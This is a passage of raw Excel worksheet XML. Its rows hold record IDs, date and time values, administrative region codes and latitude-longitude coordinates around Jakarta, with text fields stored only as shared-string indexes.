      <c r="U3339" s="5">
        <v>10668916</v>
      </c>
      <c r="V3339" s="5" t="s">
        <v>17458</v>
      </c>
      <c r="W3339" s="5">
        <v>-623755</v>
      </c>
      <c r="X3339" t="s">
        <v>21193</v>
      </c>
      <c r="Y3339" t="str">
        <f t="shared" si="52"/>
        <v>-6.23755,106.68916</v>
      </c>
    </row>
    <row r="3340" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3340">
        <v>260168</v>
      </c>
      <c r="B3340" s="1">
        <v>44247</v>
      </c>
      <c r="C3340" s="2">
        <v>0.17688657407407407</v>
      </c>
      <c r="D3340" t="s">
        <v>22</v>
      </c>
      <c r="E3340" t="s">
        <v>23</v>
      </c>
      <c r="F3340" t="s">
        <v>11132</v>
      </c>
      <c r="G3340" t="s">
        <v>11133</v>
      </c>
      <c r="H3340" t="s">
        <v>26</v>
      </c>
      <c r="I3340" t="s">
        <v>11134</v>
      </c>
      <c r="J3340" t="s">
        <v>5026</v>
      </c>
      <c r="L3340" t="s">
        <v>11135</v>
      </c>
      <c r="M3340">
        <v>3171060004</v>
      </c>
      <c r="N3340">
        <v>3171060</v>
      </c>
      <c r="O3340">
        <v>3171</v>
      </c>
      <c r="P3340">
        <v>31</v>
      </c>
      <c r="Q3340" t="s">
        <v>5027</v>
      </c>
      <c r="R3340" t="s">
        <v>1236</v>
      </c>
      <c r="S3340" t="s">
        <v>108</v>
      </c>
      <c r="T3340" t="s">
        <v>33</v>
      </c>
      <c r="U3340" s="5">
        <v>10680921</v>
      </c>
      <c r="V3340" s="5" t="s">
        <v>17459</v>
      </c>
      <c r="W3340" s="5">
        <v>-624776</v>
      </c>
      <c r="X3340" t="s">
        <v>18805</v>
      </c>
      <c r="Y3340" t="str">
        <f t="shared" si="52"/>
        <v>-6.24776,106.80921</v>
      </c>
    </row>
    <row r="3341" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3341">
        <v>260188</v>
      </c>
      <c r="B3341" s="1">
        <v>44247</v>
      </c>
      <c r="C3341" s="2">
        <v>0.16250000000000001</v>
      </c>
      <c r="D3341" t="s">
        <v>2648</v>
      </c>
      <c r="E3341" t="s">
        <v>23</v>
      </c>
      <c r="G3341" t="s">
        <v>11136</v>
      </c>
      <c r="H3341" t="s">
        <v>26</v>
      </c>
      <c r="J3341" t="s">
        <v>5747</v>
      </c>
      <c r="L3341" t="s">
        <v>11137</v>
      </c>
      <c r="M3341">
        <v>3172050002</v>
      </c>
      <c r="N3341">
        <v>3172050</v>
      </c>
      <c r="O3341">
        <v>3172</v>
      </c>
      <c r="P3341">
        <v>31</v>
      </c>
      <c r="Q3341" t="s">
        <v>5749</v>
      </c>
      <c r="R3341" t="s">
        <v>358</v>
      </c>
      <c r="S3341" t="s">
        <v>49</v>
      </c>
      <c r="T3341" t="s">
        <v>33</v>
      </c>
      <c r="U3341" s="5">
        <v>10685786</v>
      </c>
      <c r="V3341" s="5" t="s">
        <v>15526</v>
      </c>
      <c r="W3341" s="5">
        <v>-628185</v>
      </c>
      <c r="X3341" t="s">
        <v>21194</v>
      </c>
      <c r="Y3341" t="str">
        <f t="shared" si="52"/>
        <v>-6.28185,106.85786</v>
      </c>
    </row>
    <row r="3342" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3342">
        <v>260197</v>
      </c>
      <c r="B3342" s="1">
        <v>44247</v>
      </c>
      <c r="C3342" s="2">
        <v>0.17747685185185183</v>
      </c>
      <c r="D3342" t="s">
        <v>22</v>
      </c>
      <c r="E3342" t="s">
        <v>23</v>
      </c>
      <c r="F3342" t="s">
        <v>11138</v>
      </c>
      <c r="G3342" t="s">
        <v>11139</v>
      </c>
      <c r="H3342" t="s">
        <v>26</v>
      </c>
      <c r="I3342" t="s">
        <v>1624</v>
      </c>
      <c r="J3342" t="s">
        <v>723</v>
      </c>
      <c r="L3342" t="s">
        <v>11140</v>
      </c>
      <c r="M3342">
        <v>3174070002</v>
      </c>
      <c r="N3342">
        <v>3174070</v>
      </c>
      <c r="O3342">
        <v>3174</v>
      </c>
      <c r="P3342">
        <v>31</v>
      </c>
      <c r="Q3342" t="s">
        <v>621</v>
      </c>
      <c r="R3342" t="s">
        <v>84</v>
      </c>
      <c r="S3342" t="s">
        <v>32</v>
      </c>
      <c r="T3342" t="s">
        <v>33</v>
      </c>
      <c r="U3342" s="5">
        <v>10674373</v>
      </c>
      <c r="V3342" s="5" t="s">
        <v>17460</v>
      </c>
      <c r="W3342" s="5">
        <v>-616501</v>
      </c>
      <c r="X3342" t="s">
        <v>21195</v>
      </c>
      <c r="Y3342" t="str">
        <f t="shared" si="52"/>
        <v>-6.16501,106.74373</v>
      </c>
    </row>
    <row r="3343" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3343">
        <v>260254</v>
      </c>
      <c r="B3343" s="1">
        <v>44247</v>
      </c>
      <c r="C3343" s="2">
        <v>0.18129629629629629</v>
      </c>
      <c r="D3343" t="s">
        <v>22</v>
      </c>
      <c r="E3343" t="s">
        <v>23</v>
      </c>
      <c r="F3343" t="s">
        <v>11141</v>
      </c>
      <c r="H3343" t="s">
        <v>26</v>
      </c>
      <c r="I3343" t="s">
        <v>11142</v>
      </c>
      <c r="J3343" t="s">
        <v>11143</v>
      </c>
      <c r="L3343" t="s">
        <v>11144</v>
      </c>
      <c r="M3343">
        <v>3171040001</v>
      </c>
      <c r="N3343">
        <v>3171040</v>
      </c>
      <c r="O3343">
        <v>3171</v>
      </c>
      <c r="P3343">
        <v>31</v>
      </c>
      <c r="Q3343" t="s">
        <v>162</v>
      </c>
      <c r="R3343" t="s">
        <v>163</v>
      </c>
      <c r="S3343" t="s">
        <v>108</v>
      </c>
      <c r="T3343" t="s">
        <v>33</v>
      </c>
      <c r="U3343" s="5">
        <v>10675765</v>
      </c>
      <c r="V3343" s="5" t="s">
        <v>17461</v>
      </c>
      <c r="W3343" s="5">
        <v>-627401</v>
      </c>
      <c r="X3343" t="s">
        <v>21196</v>
      </c>
      <c r="Y3343" t="str">
        <f t="shared" si="52"/>
        <v>-6.27401,106.75765</v>
      </c>
    </row>
    <row r="3344" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3344">
        <v>260255</v>
      </c>
      <c r="B3344" s="1">
        <v>44247</v>
      </c>
      <c r="C3344" s="2">
        <v>0.18390046296296295</v>
      </c>
      <c r="D3344" t="s">
        <v>22</v>
      </c>
      <c r="E3344" t="s">
        <v>23</v>
      </c>
      <c r="F3344" t="s">
        <v>11145</v>
      </c>
      <c r="G3344" t="s">
        <v>11146</v>
      </c>
      <c r="H3344" t="s">
        <v>26</v>
      </c>
      <c r="I3344" t="s">
        <v>166</v>
      </c>
      <c r="J3344" t="s">
        <v>2627</v>
      </c>
      <c r="L3344" t="s">
        <v>11147</v>
      </c>
      <c r="M3344">
        <v>3275041004</v>
      </c>
      <c r="N3344">
        <v>3275041</v>
      </c>
      <c r="O3344">
        <v>3275</v>
      </c>
      <c r="P3344">
        <v>32</v>
      </c>
      <c r="Q3344" t="s">
        <v>133</v>
      </c>
      <c r="R3344" t="s">
        <v>134</v>
      </c>
      <c r="S3344" t="s">
        <v>41</v>
      </c>
      <c r="T3344" t="s">
        <v>42</v>
      </c>
      <c r="U3344" s="5">
        <v>10700781</v>
      </c>
      <c r="V3344" s="5" t="s">
        <v>17462</v>
      </c>
      <c r="W3344" s="5">
        <v>-626001</v>
      </c>
      <c r="X3344" t="s">
        <v>21197</v>
      </c>
      <c r="Y3344" t="str">
        <f t="shared" si="52"/>
        <v>-6.26001,107.00781</v>
      </c>
    </row>
    <row r="3345" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3345">
        <v>260256</v>
      </c>
      <c r="B3345" s="1">
        <v>44247</v>
      </c>
      <c r="C3345" s="2">
        <v>0.18478009259259257</v>
      </c>
      <c r="D3345" t="s">
        <v>22</v>
      </c>
      <c r="E3345" t="s">
        <v>23</v>
      </c>
      <c r="F3345" t="s">
        <v>11148</v>
      </c>
      <c r="G3345" t="s">
        <v>11149</v>
      </c>
      <c r="H3345" t="s">
        <v>26</v>
      </c>
      <c r="I3345" t="s">
        <v>3668</v>
      </c>
      <c r="J3345" t="s">
        <v>2627</v>
      </c>
      <c r="L3345" t="s">
        <v>11150</v>
      </c>
      <c r="M3345">
        <v>3275060002</v>
      </c>
      <c r="N3345">
        <v>3275060</v>
      </c>
      <c r="O3345">
        <v>3275</v>
      </c>
      <c r="P3345">
        <v>32</v>
      </c>
      <c r="Q3345" t="s">
        <v>113</v>
      </c>
      <c r="R3345" t="s">
        <v>114</v>
      </c>
      <c r="S3345" t="s">
        <v>41</v>
      </c>
      <c r="T3345" t="s">
        <v>42</v>
      </c>
      <c r="U3345" s="5">
        <v>10696860</v>
      </c>
      <c r="V3345" s="5" t="s">
        <v>17463</v>
      </c>
      <c r="W3345" s="5">
        <v>-622532</v>
      </c>
      <c r="X3345" t="s">
        <v>18895</v>
      </c>
      <c r="Y3345" t="str">
        <f t="shared" si="52"/>
        <v>-6.22532,106.96860</v>
      </c>
    </row>
    <row r="3346" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3346">
        <v>260285</v>
      </c>
      <c r="B3346" s="1">
        <v>44247</v>
      </c>
      <c r="C3346" s="2">
        <v>0.18611111111111112</v>
      </c>
      <c r="D3346" t="s">
        <v>2648</v>
      </c>
      <c r="E3346" t="s">
        <v>23</v>
      </c>
      <c r="G3346" t="s">
        <v>11151</v>
      </c>
      <c r="H3346" t="s">
        <v>26</v>
      </c>
      <c r="J3346" t="s">
        <v>2722</v>
      </c>
      <c r="L3346" t="s">
        <v>11152</v>
      </c>
      <c r="M3346">
        <v>3173010003</v>
      </c>
      <c r="N3346">
        <v>3173010</v>
      </c>
      <c r="O3346">
        <v>3173</v>
      </c>
      <c r="P3346">
        <v>31</v>
      </c>
      <c r="Q3346" t="s">
        <v>2338</v>
      </c>
      <c r="R3346" t="s">
        <v>1481</v>
      </c>
      <c r="S3346" t="s">
        <v>62</v>
      </c>
      <c r="T3346" t="s">
        <v>33</v>
      </c>
      <c r="U3346" s="5">
        <v>10681375</v>
      </c>
      <c r="V3346" s="5" t="s">
        <v>17464</v>
      </c>
      <c r="W3346" s="5">
        <v>-620285</v>
      </c>
      <c r="X3346" t="s">
        <v>21198</v>
      </c>
      <c r="Y3346" t="str">
        <f t="shared" si="52"/>
        <v>-6.20285,106.81375</v>
      </c>
    </row>
    <row r="3347" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3347">
        <v>260289</v>
      </c>
      <c r="B3347" s="1">
        <v>44247</v>
      </c>
      <c r="C3347" s="2">
        <v>0.18819444444444444</v>
      </c>
      <c r="D3347" t="s">
        <v>2648</v>
      </c>
      <c r="E3347" t="s">
        <v>23</v>
      </c>
      <c r="G3347" t="s">
        <v>11153</v>
      </c>
      <c r="H3347" t="s">
        <v>26</v>
      </c>
      <c r="J3347" t="s">
        <v>6155</v>
      </c>
      <c r="L3347" t="s">
        <v>11154</v>
      </c>
      <c r="M3347">
        <v>3174010001</v>
      </c>
      <c r="N3347">
        <v>3174010</v>
      </c>
      <c r="O3347">
        <v>3174</v>
      </c>
      <c r="P3347">
        <v>31</v>
      </c>
      <c r="Q3347" t="s">
        <v>239</v>
      </c>
      <c r="R3347" t="s">
        <v>69</v>
      </c>
      <c r="S3347" t="s">
        <v>32</v>
      </c>
      <c r="T3347" t="s">
        <v>33</v>
      </c>
      <c r="U3347" s="5">
        <v>10672030</v>
      </c>
      <c r="V3347" s="5" t="s">
        <v>17465</v>
      </c>
      <c r="W3347" s="5">
        <v>-621744</v>
      </c>
      <c r="X3347" t="s">
        <v>21199</v>
      </c>
      <c r="Y3347" t="str">
        <f t="shared" si="52"/>
        <v>-6.21744,106.72030</v>
      </c>
    </row>
    <row r="3348" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3348">
        <v>260315</v>
      </c>
      <c r="B3348" s="1">
        <v>44247</v>
      </c>
      <c r="C3348" s="2">
        <v>0.18964120370370371</v>
      </c>
      <c r="D3348" t="s">
        <v>22</v>
      </c>
      <c r="E3348" t="s">
        <v>23</v>
      </c>
      <c r="F3348" t="s">
        <v>11155</v>
      </c>
      <c r="G3348" t="s">
        <v>11156</v>
      </c>
      <c r="H3348" t="s">
        <v>26</v>
      </c>
      <c r="I3348" t="s">
        <v>657</v>
      </c>
      <c r="J3348" t="s">
        <v>11157</v>
      </c>
      <c r="L3348" t="s">
        <v>11158</v>
      </c>
      <c r="M3348">
        <v>3172050007</v>
      </c>
      <c r="N3348">
        <v>3172050</v>
      </c>
      <c r="O3348">
        <v>3172</v>
      </c>
      <c r="P3348">
        <v>31</v>
      </c>
      <c r="Q3348" t="s">
        <v>1673</v>
      </c>
      <c r="R3348" t="s">
        <v>358</v>
      </c>
      <c r="S3348" t="s">
        <v>49</v>
      </c>
      <c r="T3348" t="s">
        <v>33</v>
      </c>
      <c r="U3348" s="5">
        <v>10686060</v>
      </c>
      <c r="V3348" s="5" t="s">
        <v>17466</v>
      </c>
      <c r="W3348" s="5">
        <v>-625264</v>
      </c>
      <c r="X3348" t="s">
        <v>21200</v>
      </c>
      <c r="Y3348" t="str">
        <f t="shared" si="52"/>
        <v>-6.25264,106.86060</v>
      </c>
    </row>
    <row r="3349" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3349">
        <v>260316</v>
      </c>
      <c r="B3349" s="1">
        <v>44247</v>
      </c>
      <c r="C3349" s="2">
        <v>0.18974537037037034</v>
      </c>
      <c r="D3349" t="s">
        <v>22</v>
      </c>
      <c r="E3349" t="s">
        <v>23</v>
      </c>
      <c r="F3349" t="s">
        <v>11159</v>
      </c>
      <c r="G3349" t="s">
        <v>11160</v>
      </c>
      <c r="H3349" t="s">
        <v>26</v>
      </c>
      <c r="I3349" t="s">
        <v>11161</v>
      </c>
      <c r="J3349" t="s">
        <v>4282</v>
      </c>
      <c r="L3349" t="s">
        <v>11162</v>
      </c>
      <c r="M3349">
        <v>3171070005</v>
      </c>
      <c r="N3349">
        <v>3171070</v>
      </c>
      <c r="O3349">
        <v>3171</v>
      </c>
      <c r="P3349">
        <v>31</v>
      </c>
      <c r="Q3349" t="s">
        <v>218</v>
      </c>
      <c r="R3349" t="s">
        <v>121</v>
      </c>
      <c r="S3349" t="s">
        <v>108</v>
      </c>
      <c r="T3349" t="s">
        <v>33</v>
      </c>
      <c r="U3349" s="5">
        <v>10681906</v>
      </c>
      <c r="V3349" s="5" t="s">
        <v>14893</v>
      </c>
      <c r="W3349" s="5">
        <v>-623419</v>
      </c>
      <c r="X3349" t="s">
        <v>21201</v>
      </c>
      <c r="Y3349" t="str">
        <f t="shared" si="52"/>
        <v>-6.23419,106.81906</v>
      </c>
    </row>
    <row r="3350" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3350">
        <v>260317</v>
      </c>
      <c r="B3350" s="1">
        <v>44247</v>
      </c>
      <c r="C3350" s="2">
        <v>0.19122685185185184</v>
      </c>
      <c r="D3350" t="s">
        <v>22</v>
      </c>
      <c r="E3350" t="s">
        <v>23</v>
      </c>
      <c r="F3350" t="s">
        <v>11163</v>
      </c>
      <c r="G3350" t="s">
        <v>11164</v>
      </c>
      <c r="H3350" t="s">
        <v>26</v>
      </c>
      <c r="I3350" t="s">
        <v>11165</v>
      </c>
      <c r="J3350" t="s">
        <v>11166</v>
      </c>
      <c r="L3350" t="s">
        <v>11167</v>
      </c>
      <c r="M3350">
        <v>3173010004</v>
      </c>
      <c r="N3350">
        <v>3173010</v>
      </c>
      <c r="O3350">
        <v>3173</v>
      </c>
      <c r="P3350">
        <v>31</v>
      </c>
      <c r="Q3350" t="s">
        <v>11168</v>
      </c>
      <c r="R3350" t="s">
        <v>1481</v>
      </c>
      <c r="S3350" t="s">
        <v>62</v>
      </c>
      <c r="T3350" t="s">
        <v>33</v>
      </c>
      <c r="U3350" s="5">
        <v>10681754</v>
      </c>
      <c r="V3350" s="5" t="s">
        <v>17467</v>
      </c>
      <c r="W3350" s="5">
        <v>-619714</v>
      </c>
      <c r="X3350" t="s">
        <v>21202</v>
      </c>
      <c r="Y3350" t="str">
        <f t="shared" si="52"/>
        <v>-6.19714,106.81754</v>
      </c>
    </row>
    <row r="3351" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3351">
        <v>260348</v>
      </c>
      <c r="B3351" s="1">
        <v>44247</v>
      </c>
      <c r="C3351" s="2">
        <v>0.19243055555555555</v>
      </c>
      <c r="D3351" t="s">
        <v>22</v>
      </c>
      <c r="E3351" t="s">
        <v>23</v>
      </c>
      <c r="F3351" t="s">
        <v>11169</v>
      </c>
      <c r="H3351" t="s">
        <v>26</v>
      </c>
      <c r="I3351" t="s">
        <v>1971</v>
      </c>
      <c r="J3351" t="s">
        <v>2627</v>
      </c>
      <c r="L3351" t="s">
        <v>11170</v>
      </c>
      <c r="M3351">
        <v>3216061011</v>
      </c>
      <c r="N3351">
        <v>3216061</v>
      </c>
      <c r="O3351">
        <v>3216</v>
      </c>
      <c r="P3351">
        <v>32</v>
      </c>
      <c r="Q3351" t="s">
        <v>11026</v>
      </c>
      <c r="R3351" t="s">
        <v>55</v>
      </c>
      <c r="S3351" t="s">
        <v>41</v>
      </c>
      <c r="T3351" t="s">
        <v>42</v>
      </c>
      <c r="U3351" s="5">
        <v>10718392</v>
      </c>
      <c r="V3351" s="5" t="s">
        <v>17468</v>
      </c>
      <c r="W3351" s="5">
        <v>-626849</v>
      </c>
      <c r="X3351" t="s">
        <v>21203</v>
      </c>
      <c r="Y3351" t="str">
        <f t="shared" si="52"/>
        <v>-6.26849,107.18392</v>
      </c>
    </row>
    <row r="3352" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3352">
        <v>260349</v>
      </c>
      <c r="B3352" s="1">
        <v>44247</v>
      </c>
      <c r="C3352" s="2">
        <v>0.19392361111111112</v>
      </c>
      <c r="D3352" t="s">
        <v>22</v>
      </c>
      <c r="E3352" t="s">
        <v>23</v>
      </c>
      <c r="F3352" t="s">
        <v>11171</v>
      </c>
      <c r="G3352" t="s">
        <v>11172</v>
      </c>
      <c r="H3352" t="s">
        <v>26</v>
      </c>
      <c r="I3352" t="s">
        <v>443</v>
      </c>
      <c r="J3352" t="s">
        <v>498</v>
      </c>
      <c r="M3352">
        <v>3171020006</v>
      </c>
      <c r="N3352">
        <v>3171020</v>
      </c>
      <c r="O3352">
        <v>3171</v>
      </c>
      <c r="P3352">
        <v>31</v>
      </c>
      <c r="Q3352" t="s">
        <v>499</v>
      </c>
      <c r="R3352" t="s">
        <v>484</v>
      </c>
      <c r="S3352" t="s">
        <v>108</v>
      </c>
      <c r="T3352" t="s">
        <v>33</v>
      </c>
      <c r="U3352" s="5">
        <v>10683332</v>
      </c>
      <c r="V3352" s="5" t="s">
        <v>17469</v>
      </c>
      <c r="W3352" s="5">
        <v>-626942</v>
      </c>
      <c r="X3352" t="s">
        <v>21204</v>
      </c>
      <c r="Y3352" t="str">
        <f t="shared" si="52"/>
        <v>-6.26942,106.83332</v>
      </c>
    </row>
    <row r="3353" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3353">
        <v>260350</v>
      </c>
      <c r="B3353" s="1">
        <v>44247</v>
      </c>
      <c r="C3353" s="2">
        <v>0.19703703703703704</v>
      </c>
      <c r="D3353" t="s">
        <v>22</v>
      </c>
      <c r="E3353" t="s">
        <v>23</v>
      </c>
      <c r="F3353" t="s">
        <v>11173</v>
      </c>
      <c r="G3353" t="s">
        <v>11174</v>
      </c>
      <c r="H3353" t="s">
        <v>26</v>
      </c>
      <c r="I3353" t="s">
        <v>11175</v>
      </c>
      <c r="J3353" t="s">
        <v>2627</v>
      </c>
      <c r="L3353" t="s">
        <v>11176</v>
      </c>
      <c r="M3353">
        <v>3216061005</v>
      </c>
      <c r="N3353">
        <v>3216061</v>
      </c>
      <c r="O3353">
        <v>3216</v>
      </c>
      <c r="P3353">
        <v>32</v>
      </c>
      <c r="Q3353" t="s">
        <v>10898</v>
      </c>
      <c r="R3353" t="s">
        <v>55</v>
      </c>
      <c r="S3353" t="s">
        <v>41</v>
      </c>
      <c r="T3353" t="s">
        <v>42</v>
      </c>
      <c r="U3353" s="5">
        <v>10718214</v>
      </c>
      <c r="V3353" s="5" t="s">
        <v>17470</v>
      </c>
      <c r="W3353" s="5">
        <v>-627320</v>
      </c>
      <c r="X3353" t="s">
        <v>21205</v>
      </c>
      <c r="Y3353" t="str">
        <f t="shared" si="52"/>
        <v>-6.27320,107.18214</v>
      </c>
    </row>
    <row r="3354" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3354">
        <v>260351</v>
      </c>
      <c r="B3354" s="1">
        <v>44247</v>
      </c>
      <c r="C3354" s="2">
        <v>0.19868055555555555</v>
      </c>
      <c r="D3354" t="s">
        <v>22</v>
      </c>
      <c r="E3354" t="s">
        <v>23</v>
      </c>
      <c r="F3354" t="s">
        <v>11177</v>
      </c>
      <c r="G3354" t="s">
        <v>11178</v>
      </c>
      <c r="H3354" t="s">
        <v>26</v>
      </c>
      <c r="I3354" t="s">
        <v>166</v>
      </c>
      <c r="J3354" t="s">
        <v>5280</v>
      </c>
      <c r="M3354">
        <v>3171060009</v>
      </c>
      <c r="N3354">
        <v>3171060</v>
      </c>
      <c r="O3354">
        <v>3171</v>
      </c>
      <c r="P3354">
        <v>31</v>
      </c>
      <c r="Q3354" t="s">
        <v>11179</v>
      </c>
      <c r="R3354" t="s">
        <v>1236</v>
      </c>
      <c r="S3354" t="s">
        <v>108</v>
      </c>
      <c r="T3354" t="s">
        <v>33</v>
      </c>
      <c r="U3354" s="5">
        <v>10681710</v>
      </c>
      <c r="V3354" s="5" t="s">
        <v>16026</v>
      </c>
      <c r="W3354" s="5">
        <v>-623878</v>
      </c>
      <c r="X3354" t="s">
        <v>21206</v>
      </c>
      <c r="Y3354" t="str">
        <f t="shared" si="52"/>
        <v>-6.23878,106.81710</v>
      </c>
    </row>
    <row r="3355" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3355">
        <v>260359</v>
      </c>
      <c r="B3355" s="1">
        <v>44247</v>
      </c>
      <c r="C3355" s="2">
        <v>0.19166666666666665</v>
      </c>
      <c r="D3355" t="s">
        <v>2648</v>
      </c>
      <c r="E3355" t="s">
        <v>23</v>
      </c>
      <c r="G3355" t="s">
        <v>11180</v>
      </c>
      <c r="H3355" t="s">
        <v>26</v>
      </c>
      <c r="J3355" t="s">
        <v>425</v>
      </c>
      <c r="L3355" t="s">
        <v>11181</v>
      </c>
      <c r="M3355">
        <v>3174020006</v>
      </c>
      <c r="N3355">
        <v>3174020</v>
      </c>
      <c r="O3355">
        <v>3174</v>
      </c>
      <c r="P3355">
        <v>31</v>
      </c>
      <c r="Q3355" t="s">
        <v>427</v>
      </c>
      <c r="R3355" t="s">
        <v>31</v>
      </c>
      <c r="S3355" t="s">
        <v>32</v>
      </c>
      <c r="T3355" t="s">
        <v>33</v>
      </c>
      <c r="U3355" s="5">
        <v>10675600</v>
      </c>
      <c r="V3355" s="5" t="s">
        <v>17471</v>
      </c>
      <c r="W3355" s="5">
        <v>-617829</v>
      </c>
      <c r="X3355" t="s">
        <v>21207</v>
      </c>
      <c r="Y3355" t="str">
        <f t="shared" si="52"/>
        <v>-6.17829,106.75600</v>
      </c>
    </row>
    <row r="3356" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3356">
        <v>260383</v>
      </c>
      <c r="B3356" s="1">
        <v>44247</v>
      </c>
      <c r="C3356" s="2">
        <v>0.20074074074074075</v>
      </c>
      <c r="D3356" t="s">
        <v>22</v>
      </c>
      <c r="E3356" t="s">
        <v>23</v>
      </c>
      <c r="F3356" t="s">
        <v>11182</v>
      </c>
      <c r="G3356" t="s">
        <v>11183</v>
      </c>
      <c r="H3356" t="s">
        <v>7086</v>
      </c>
      <c r="I3356" t="s">
        <v>11184</v>
      </c>
      <c r="J3356" t="s">
        <v>6963</v>
      </c>
      <c r="L3356" t="s">
        <v>11185</v>
      </c>
      <c r="M3356">
        <v>3171020007</v>
      </c>
      <c r="N3356">
        <v>3171020</v>
      </c>
      <c r="O3356">
        <v>3171</v>
      </c>
      <c r="P3356">
        <v>31</v>
      </c>
      <c r="Q3356" t="s">
        <v>5778</v>
      </c>
      <c r="R3356" t="s">
        <v>484</v>
      </c>
      <c r="S3356" t="s">
        <v>108</v>
      </c>
      <c r="T3356" t="s">
        <v>33</v>
      </c>
      <c r="U3356" s="5">
        <v>10684927</v>
      </c>
      <c r="V3356" s="5" t="s">
        <v>17472</v>
      </c>
      <c r="W3356" s="5">
        <v>-628992</v>
      </c>
      <c r="X3356" t="s">
        <v>21208</v>
      </c>
      <c r="Y3356" t="str">
        <f t="shared" si="52"/>
        <v>-6.28992,106.84927</v>
      </c>
    </row>
    <row r="3357" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3357">
        <v>260384</v>
      </c>
      <c r="B3357" s="1">
        <v>44247</v>
      </c>
      <c r="C3357" s="2">
        <v>0.20202546296296298</v>
      </c>
      <c r="D3357" t="s">
        <v>22</v>
      </c>
      <c r="E3357" t="s">
        <v>23</v>
      </c>
      <c r="F3357" t="s">
        <v>11186</v>
      </c>
      <c r="G3357" t="s">
        <v>11187</v>
      </c>
      <c r="H3357" t="s">
        <v>26</v>
      </c>
      <c r="I3357" t="s">
        <v>961</v>
      </c>
      <c r="J3357" t="s">
        <v>6050</v>
      </c>
      <c r="M3357">
        <v>3172020005</v>
      </c>
      <c r="N3357">
        <v>3172020</v>
      </c>
      <c r="O3357">
        <v>3172</v>
      </c>
      <c r="P3357">
        <v>31</v>
      </c>
      <c r="Q3357" t="s">
        <v>3744</v>
      </c>
      <c r="R3357" t="s">
        <v>1644</v>
      </c>
      <c r="S3357" t="s">
        <v>49</v>
      </c>
      <c r="T3357" t="s">
        <v>33</v>
      </c>
      <c r="U3357" s="5">
        <v>10688292</v>
      </c>
      <c r="V3357" s="5" t="s">
        <v>17473</v>
      </c>
      <c r="W3357" s="5">
        <v>-631521</v>
      </c>
      <c r="X3357" t="s">
        <v>21209</v>
      </c>
      <c r="Y3357" t="str">
        <f t="shared" si="52"/>
        <v>-6.31521,106.88292</v>
      </c>
    </row>
    <row r="3358" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3358">
        <v>260416</v>
      </c>
      <c r="B3358" s="1">
        <v>44247</v>
      </c>
      <c r="C3358" s="2">
        <v>0.20476851851851852</v>
      </c>
      <c r="D3358" t="s">
        <v>22</v>
      </c>
      <c r="E3358" t="s">
        <v>23</v>
      </c>
      <c r="F3358" t="s">
        <v>11188</v>
      </c>
      <c r="G3358" t="s">
        <v>11189</v>
      </c>
      <c r="H3358" t="s">
        <v>26</v>
      </c>
      <c r="I3358" t="s">
        <v>11190</v>
      </c>
      <c r="J3358" t="s">
        <v>4487</v>
      </c>
      <c r="L3358" t="s">
        <v>250</v>
      </c>
      <c r="M3358">
        <v>3171070001</v>
      </c>
      <c r="N3358">
        <v>3171070</v>
      </c>
      <c r="O3358">
        <v>3171</v>
      </c>
      <c r="P3358">
        <v>31</v>
      </c>
      <c r="Q3358" t="s">
        <v>120</v>
      </c>
      <c r="R3358" t="s">
        <v>121</v>
      </c>
      <c r="S3358" t="s">
        <v>108</v>
      </c>
      <c r="T3358" t="s">
        <v>33</v>
      </c>
      <c r="U3358" s="5">
        <v>10682520</v>
      </c>
      <c r="V3358" s="5" t="s">
        <v>17474</v>
      </c>
      <c r="W3358" s="5">
        <v>-626212</v>
      </c>
      <c r="X3358" t="s">
        <v>21210</v>
      </c>
      <c r="Y3358" t="str">
        <f t="shared" si="52"/>
        <v>-6.26212,106.82520</v>
      </c>
    </row>
    <row r="3359" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3359">
        <v>260417</v>
      </c>
      <c r="B3359" s="1">
        <v>44247</v>
      </c>
      <c r="C3359" s="2">
        <v>0.20486111111111113</v>
      </c>
      <c r="D3359" t="s">
        <v>2648</v>
      </c>
      <c r="E3359" t="s">
        <v>23</v>
      </c>
      <c r="G3359" t="s">
        <v>11191</v>
      </c>
      <c r="H3359" t="s">
        <v>26</v>
      </c>
      <c r="J3359" t="s">
        <v>11192</v>
      </c>
      <c r="L3359" t="s">
        <v>11193</v>
      </c>
      <c r="M3359">
        <v>3172040003</v>
      </c>
      <c r="N3359">
        <v>3172040</v>
      </c>
      <c r="O3359">
        <v>3172</v>
      </c>
      <c r="P3359">
        <v>31</v>
      </c>
      <c r="Q3359" t="s">
        <v>552</v>
      </c>
      <c r="R3359" t="s">
        <v>281</v>
      </c>
      <c r="S3359" t="s">
        <v>49</v>
      </c>
      <c r="T3359" t="s">
        <v>33</v>
      </c>
      <c r="U3359" s="5">
        <v>10687345</v>
      </c>
      <c r="V3359" s="5" t="s">
        <v>17475</v>
      </c>
      <c r="W3359" s="5">
        <v>-625177</v>
      </c>
      <c r="X3359" t="s">
        <v>21211</v>
      </c>
      <c r="Y3359" t="str">
        <f t="shared" si="52"/>
        <v>-6.25177,106.87345</v>
      </c>
    </row>
    <row r="3360" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3360">
        <v>260449</v>
      </c>
      <c r="B3360" s="1">
        <v>44247</v>
      </c>
      <c r="C3360" s="2">
        <v>0.20819444444444443</v>
      </c>
      <c r="D3360" t="s">
        <v>22</v>
      </c>
      <c r="E3360" t="s">
        <v>23</v>
      </c>
      <c r="F3360" t="s">
        <v>11194</v>
      </c>
      <c r="G3360" t="s">
        <v>11195</v>
      </c>
      <c r="H3360" t="s">
        <v>26</v>
      </c>
      <c r="I3360" t="s">
        <v>666</v>
      </c>
      <c r="J3360" t="s">
        <v>3135</v>
      </c>
      <c r="L3360" t="s">
        <v>11196</v>
      </c>
      <c r="M3360">
